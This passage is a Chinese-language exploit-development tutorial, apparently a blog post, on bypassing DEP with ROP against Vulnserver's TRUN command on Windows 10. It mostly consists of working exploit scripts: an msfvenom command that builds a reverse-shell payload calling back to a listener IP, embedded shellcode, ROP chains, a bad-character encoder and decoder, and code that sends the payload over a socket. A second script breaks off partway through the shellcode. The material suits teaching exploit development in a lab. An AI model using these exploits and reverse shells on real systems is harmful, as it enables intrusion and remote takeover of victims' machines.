<p>还有一个需要注意的地方:因为编码和解码都是自己完成的,用<code>msfvenom</code>只需生成原始(未经编码的)<code>shellcode</code>即可。本地生成命令如下:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode</span><br></pre></td></tr></table></figure>
<p>以上是需要注意的地方。当只存在单个坏字符时,最终的利用脚本如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span 
class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span 
class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">HOST = <span class="string">'192.168.91.160'</span></span><br><span class="line">PORT = <span class="number">9999</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">mapBadChars</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> i = <span class="number">0</span></span><br><span class="line"> badIndex = []</span><br><span class="line"> <span class="keyword">while</span> i < len(sh):</span><br><span class="line"> <span class="keyword">for</span> c <span class="keyword">in</span> BADCHARS:</span><br><span class="line"> <span class="keyword">if</span> sh[i] == c:</span><br><span class="line"> badIndex.append(i)</span><br><span class="line"> i=i+<span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> badIndex</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span 
class="title">encodeShellcode</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> REPLACECHARS = <span class="string">b"\xff"</span></span><br><span class="line"> encodedShell = sh</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> encodedShell = encodedShell.replace(struct.pack(<span class="string">"B"</span>, BADCHARS[i]), struct.pack(<span class="string">"B"</span>, REPLACECHARS[i]))</span><br><span class="line"> <span class="keyword">return</span> encodedShell</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decodeShellcode</span><span class="params">(dllBase, badIndex, shellcode)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> CHARSTOADD = <span class="string">b"\x01"</span></span><br><span class="line"> restoreRop = <span class="string">b""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(badIndex)):</span><br><span class="line"> <span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line"> offset = badIndex[i]</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> offset = badIndex[i] - badIndex[i<span class="number">-1</span>]</span><br><span class="line"> neg_offset = (-offset) & <span class="number">0xffffffff</span></span><br><span class="line"> value = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> <span class="keyword">if</span> shellcode[badIndex[i]] == BADCHARS[j]:</span><br><span class="line"> value = 
CHARSTOADD[j]</span><br><span class="line"> value = (value) | <span class="number">0x11111100</span> <span class="comment"># DL</span></span><br><span class="line"> print(hex(value))</span><br><span class="line"></span><br><span class="line"> <span class="comment"># current EAX point to the address of shellcode-1</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x7637768e</span>)) <span class="comment"># POP ECX # RETN ** [WS2_32.DLL] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (neg_offset))</span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x758ba9a8</span>)) <span class="comment"># SUB EAX,ECX # RETN ** [KERNEL32.DLL] ** </span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (<span class="number">0x7721aed0</span>)) <span class="comment"># POP EDX # RETN ** [ntdll.dll] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (value)) <span class="comment"># values in DL</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x755bc4eb</span>)) <span class="comment"># ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] ** </span></span><br><span class="line"> <span class="keyword">return</span> restoreRop </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode</span></span><br><span class="line"> shellcode = <span class="string">b""</span></span><br><span 
class="line"> shellcode += <span class="string">b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0"</span></span><br><span class="line"> shellcode += <span class="string">b"\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b"</span></span><br><span class="line"> shellcode += <span class="string">b"\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61"</span></span><br><span class="line"> shellcode += <span class="string">b"\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2"</span></span><br><span class="line"> shellcode += <span class="string">b"\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11"</span></span><br><span class="line"> shellcode += <span class="string">b"\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3"</span></span><br><span class="line"> shellcode += <span class="string">b"\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6"</span></span><br><span class="line"> shellcode += <span class="string">b"\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"</span></span><br><span class="line"> shellcode += <span class="string">b"\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b"</span></span><br><span class="line"> shellcode += <span class="string">b"\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"</span></span><br><span class="line"> shellcode += <span class="string">b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"</span></span><br><span class="line"> shellcode += <span class="string">b"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"</span></span><br><span class="line"> shellcode += <span class="string">b"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"</span></span><br><span class="line"> shellcode += <span class="string">b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff"</span></span><br><span class="line"> shellcode += <span class="string">b"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"</span></span><br><span class="line"> shellcode += <span class="string">b"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40"</span></span><br><span class="line"> shellcode += <span 
class="string">b"\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97"</span></span><br><span class="line"> shellcode += <span class="string">b"\x6a\x05\x68\xc0\xa8\x5b\x89\x68\x02\x00\x11"</span></span><br><span class="line"> shellcode += <span class="string">b"\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74"</span></span><br><span class="line"> shellcode += <span class="string">b"\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75"</span></span><br><span class="line"> shellcode += <span class="string">b"\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d"</span></span><br><span class="line"> shellcode += <span class="string">b"\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12"</span></span><br><span class="line"> shellcode += <span class="string">b"\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"</span></span><br><span class="line"> shellcode += <span class="string">b"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"</span></span><br><span class="line"> shellcode += <span class="string">b"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"</span></span><br><span class="line"> shellcode += <span class="string">b"\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"</span></span><br><span class="line"> shellcode += <span class="string">b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a"</span></span><br><span class="line"> shellcode += <span class="string">b"\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"</span></span><br><span class="line"> shellcode += <span class="string">b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f"</span></span><br><span class="line"> shellcode += <span class="string">b"\x6a\x00\x53\xff\xd5"</span></span><br><span class="line"></span><br><span class="line"> pos = mapBadChars(shellcode)</span><br><span class="line"> print(pos)</span><br><span class="line"> encodedRevShell = encodeShellcode(shellcode)</span><br><span class="line"></span><br><span class="line"> func = struct.pack(<span class="string">"<L"</span>,<span class="number">0x45454545</span>) <span class="comment"># WriteProcessMemory 
Address</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Shellcode Return Address</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0xFFFFFFFF</span>) <span class="comment"># pseudo Process handle</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Code cave address</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy lpBuffer (Stack address) </span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy nSize</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62502028</span>) <span class="comment"># lpNumberOfBytesWritten</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> eip = struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501022</span>) <span class="comment"># retn essfunc.dll</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># save ESP to ESI,EDX,EAX</span></span><br><span class="line"> rop1 = struct.pack(<span class="string">"<L"</span>, <span class="number">0x755912d6</span>) <span class="comment"># PUSH ESP # POP ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x755b671f</span>) <span class="comment"># MOV EDX,ESI # POP ESI # RETN 0x04 </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"> rop1 += 
struct.pack(<span class="string">"<L"</span>, <span class="number">0x7728bdf4</span>) <span class="comment"># MOV EAX,EDX # POP ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Patching dummy lpBuffer</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x88888888</span>) <span class="comment"># 0x88888888</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x77777988</span>) <span class="comment"># 0x77777988</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758fe636</span>) <span class="comment"># MOV EAX,EDX # RETN </span></span><br><span class="line"> rop1 += 
struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Patching dummy nSize</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffffdf4</span>) <span class="comment"># 0xfffffdf4</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span 
class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Patching WriteProcessMemory Address</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x62506090</span>) <span class="comment"># IAT 62506090 AddAtomA KERNEL32 </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75fd7518</span>) <span class="comment"># XCHG EAX,DWORD PTR [ECX] # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span 
class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7557771b</span>) <span class="comment"># POP EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffd9df0</span>) <span class="comment"># 0xfffd9df0</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># save current EAX to EBX</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7730e63c</span>) <span class="comment"># XCHG EAX,ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75f84c67</span>) <span class="comment"># MOV EAX,ESI # RETN</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Align EAX with shellcode</span></span><br><span class="line"> rop1 += struct.pack(<span 
class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>,<span class="number">0xfffffda8</span>) <span class="comment"># 0n600</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772974e4</span>) <span class="comment"># SUB EAX,ECX # RETN ** [ntdll.dll] ** </span></span><br><span class="line"></span><br><span class="line"> rop1 += decodeShellcode(<span class="number">0</span>, pos, shellcode)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Align ESP with ROP Skeleton</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7730e63c</span>) <span class="comment"># XCHG EAX,ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f2002</span>) <span class="comment"># XCHG EAX,ESP # RETN </span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment"># padding = b"C" * (3000-2006-32-len(rop1)-len(shellcode))</span></span><br><span class="line"> padding = <span class="string">b"\x44"</span> * <span class="number">16</span></span><br><span class="line"></span><br><span class="line"> PAYLOAD = (</span><br><span class="line"> <span class="string">b'TRUN .'</span> +</span><br><span class="line"> <span class="string">b'A'</span> * (<span class="number">2006</span>-len(func)) +</span><br><span class="line"> func +</span><br><span class="line"> eip +</span><br><span class="line"> rop1 + </span><br><span class="line"> <span class="string">b"\x90"</span>*<span class="number">80</span>+</span><br><span class="line"> encodedRevShell+</span><br><span class="line"> padding</span><br><span class="line"> 
)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">with</span> socket.create_connection((HOST, PORT)) <span class="keyword">as</span> fd:</span><br><span class="line"> fd.sendall(PAYLOAD)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure>
<p>喜闻乐见的反弹<code>shell</code>如下:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/21.png" alt="BOF"></p>
<p>只有单个坏字符时,用于解码的<code>ROP Gadgets</code>一般不会很长;如果涉及很多坏字符,解码的<code>ROP Gadgets</code>会变得很长(本文的解码器每处理一个坏字符需要 6 个 DWORD,即 24 字节),可能因为栈空间不够而挤占<code>shellcode</code>,使其后半部分被截断,最终导致利用失败。</p>
<p>尝试 7 个坏字符时,最后因为栈空间不够导致<code>shellcode</code>被截断;改为<code>3</code>个坏字符的情况则还算正常。利用脚本如下:</p>
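#!/usr/bin/env python3
"""
Vulnserver TRUN - DEP bypass with ROP on Windows 10 (lab exploit).

Buffer sent to TRUN:

    'TRUN .' | 'A' filler | func (WriteProcessMemory call skeleton) | eip (RETN)
            | rop1 (skeleton patching + shellcode decoder) | NOP sled
            | encoded shellcode | padding

The TRUN input does not pass \\x00, \\x09 and \\x0a through unchanged, so every
such byte in the msfvenom shellcode is swapped for a placeholder before sending
and a ROP "decoder" (one ADD BYTE PTR [EAX],DL per bad byte) restores it on the
stack before WriteProcessMemory copies the shellcode into an executable code
cave in essfunc.dll.

All gadget addresses are absolute values captured on one lab machine.  Most of
them live in system DLLs (ntdll, kernel32, kernelbase, ws2_32, ...), so they
will not be valid on another machine or, after a reboot, on the same one -
re-harvest them before reuse.
"""

import socket
import struct

HOST = '192.168.91.160'
PORT = 9999

# Bytes that must never appear anywhere in the payload.
BADCHARS = b"\x00\x09\x0a"
# Placeholder sent in place of each bad byte ...
REPLACECHARS = b"\xff\x10\x06"
# ... and the per-byte correction the decoder adds back (mod 256) to restore it.
CHARSTOADD = b"\x01\xf9\x04"

# The encoder and decoder tables must agree, and a placeholder may not itself
# be a bad byte - otherwise the encoded shellcode would be mangled in transit.
for _bad, _rep, _add in zip(BADCHARS, REPLACECHARS, CHARSTOADD):
    assert (_rep + _add) & 0xff == _bad, "decoder table does not restore 0x%02x" % _bad
    assert _rep not in BADCHARS, "placeholder 0x%02x is itself a bad char" % _rep


def _checkNoBadChars(blob, what):
    """Raise ValueError if *blob* contains a byte from BADCHARS.

    Everything - gadget addresses, run-time generated dwords, shellcode -
    travels through the same TRUN input, so the check applies to all of it.
    """
    for i, b in enumerate(blob):
        if b in BADCHARS:
            raise ValueError("%s: bad char 0x%02x at offset %d" % (what, b, i))


def mapBadChars(sh):
    """Return the ascending list of offsets in *sh* that hold a bad byte."""
    return [i for i, b in enumerate(sh) if b in BADCHARS]


def encodeShellcode(sh):
    """Replace every bad byte of *sh* with its placeholder from REPLACECHARS.

    The result is what goes over the wire; decodeShellcode() builds the ROP
    that reverses the substitution in memory.  Raises ValueError if the
    encoded result still contains a bad byte.
    """
    encodedShell = bytes(sh)
    for bad, rep in zip(BADCHARS, REPLACECHARS):
        encodedShell = encodedShell.replace(bytes([bad]), bytes([rep]))
    _checkNoBadChars(encodedShell, "encoded shellcode")
    return encodedShell


def decodeShellcode(dllBase, badIndex, shellcode):
    """Build the ROP that restores the bad bytes of *shellcode* in memory.

    *badIndex* is the list produced by mapBadChars(shellcode); *shellcode* is
    the ORIGINAL (unencoded) buffer, used to look up which correction each
    position needs.

    On entry EAX must point at shellcode[0]: main()'s "Align EAX with
    shellcode" step adds 648 to the saved skeleton address, which with the
    payload layout in main() is exactly the first shellcode byte, and the
    first distance emitted here is badIndex[0].  For every bad byte six
    dwords (24 bytes) are emitted:

        POP ECX                ; ECX = -(distance from the previous bad byte)
        SUB EAX, ECX           ; EAX += distance.  Subtracting a negative keeps
                               ;   the dword free of null bytes, which ADD with
                               ;   a small positive value would not.
        POP EDX                ; DL = correction; the 0x11 upper bytes are filler
        ADD BYTE PTR [EAX], DL

    *dllBase* is added to three of the four gadget addresses and main() passes
    0.  The gadgets live in different DLLs, so one base cannot rebase them;
    treat them as absolute, per-boot addresses.

    Raises ValueError if a generated dword would itself contain a bad byte
    (for example a distance of 0x100 encodes to 0xffffff00).
    """
    restoreRop = b""
    prev = 0
    for idx in badIndex:
        offset = idx - prev
        prev = idx
        neg_offset = (-offset) & 0xffffffff

        value = 0
        for bad, add in zip(BADCHARS, CHARSTOADD):
            if shellcode[idx] == bad:
                value = add
        value |= 0x11111100  # only DL is consumed by the gadget; filler avoids nulls
        print(hex(value))

        chunk = struct.pack("<L", dllBase + 0x7637768e)   # POP ECX # RETN ** [WS2_32.DLL] **
        chunk += struct.pack("<L", neg_offset)
        chunk += struct.pack("<L", dllBase + 0x758ba9a8)  # SUB EAX,ECX # RETN ** [KERNEL32.DLL] **
        chunk += struct.pack("<L", 0x7721aed0)            # POP EDX # RETN ** [ntdll.dll] **
        chunk += struct.pack("<L", value)                 # correction in DL
        chunk += struct.pack("<L", dllBase + 0x755bc4eb)  # ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] **
        _checkNoBadChars(chunk, "decoder ROP for shellcode offset %d" % idx)
        restoreRop += chunk
    return restoreRop


def main():
    """Assemble the TRUN payload and send it to HOST:PORT."""

    # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode
    # The embedded "push 0xc0a85b89" / "push 0x115c0002" encode 192.168.91.137:4444;
    # regenerate the shellcode for a different listener.
    shellcode = b""
    shellcode += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0"
    shellcode += b"\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b"
    shellcode += b"\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61"
    shellcode += b"\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2"
    shellcode += b"\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11"
    shellcode += b"\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3"
    shellcode += b"\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6"
    shellcode += b"\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"
    shellcode += b"\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b"
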